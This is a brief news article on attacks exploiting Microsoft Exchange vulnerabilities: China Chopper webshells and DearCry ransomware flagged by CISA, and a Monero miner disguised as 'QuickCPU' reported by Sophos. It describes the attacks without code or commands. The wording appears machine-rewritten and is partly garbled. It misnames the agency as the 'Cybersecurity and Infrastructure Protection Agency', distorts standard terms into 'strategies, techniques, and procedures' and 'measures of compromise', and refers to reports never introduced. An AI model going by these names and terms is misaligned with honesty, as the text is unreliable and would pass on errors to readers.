China Chopper webshells and the DearCry ransomware were discovered on infected Microsoft Exchange servers this week, according to the US Cybersecurity and Infrastructure Protection Agency (CISA).
The malware authors use a collection of vulnerabilities that were made public on March 3, the same day Microsoft released patches for them. Before the public release, the vulnerabilities had been targeted, and interest in them grew quickly.
The first of these provides information on the China Chopper webshells that were discovered on Exchange servers after they were first compromised by the aforementioned vulnerabilities, and which give attackers control over the infected computer.
According to CISA, a total of ten webshells have been discovered, although this is not an exhaustive list of webshells used by threat actors in attacks against Exchange servers.
In addition, CISA is alert about attacks on Microsoft Exchange that are attempting to infect compromised servers with the DearCry ransomware.
DearCry, also known as DoejoCrypt, is the first ransomware family to attack Microsoft Exchange servers. The Black Kingdom/Pydomer ransomware has been making similar attempts for over two weeks.
CISA has included strategies, techniques, and procedures (TTPs) as well as measures of compromise (IOCs) in the newly shared MARs to assist defenders in identifying and resolving possible compromise.
Attacks on Microsoft Exchange servers, on the other hand, are much more varied, and in some cases include the use of cryptominers. Indeed, Microsoft issued an alert about behaviour involving the Lemon Duck cryptocurrency botnet about two weeks ago.
Now, according to Sophos, the targeting of Exchange servers for crypto-mining purposes began on March 9, just hours after Microsoft published Patch Tuesday updates to fix the exploited vulnerabilities. An unknown attacker has been compromising servers to deploy a malicious Monero miner since then, according to the security firm.
The fact that the malicious payload is hosted on a compromised Exchange server and retrieved via a PowerShell command sets this attack apart. The payload is disguised as a legitimate programme called QuickCPU.
The miner was loaded onto several compromised servers within days, resulting in a large increase in crypto-currency performance. Since the miner has lost some of the infected computers, operation has slowed considerably.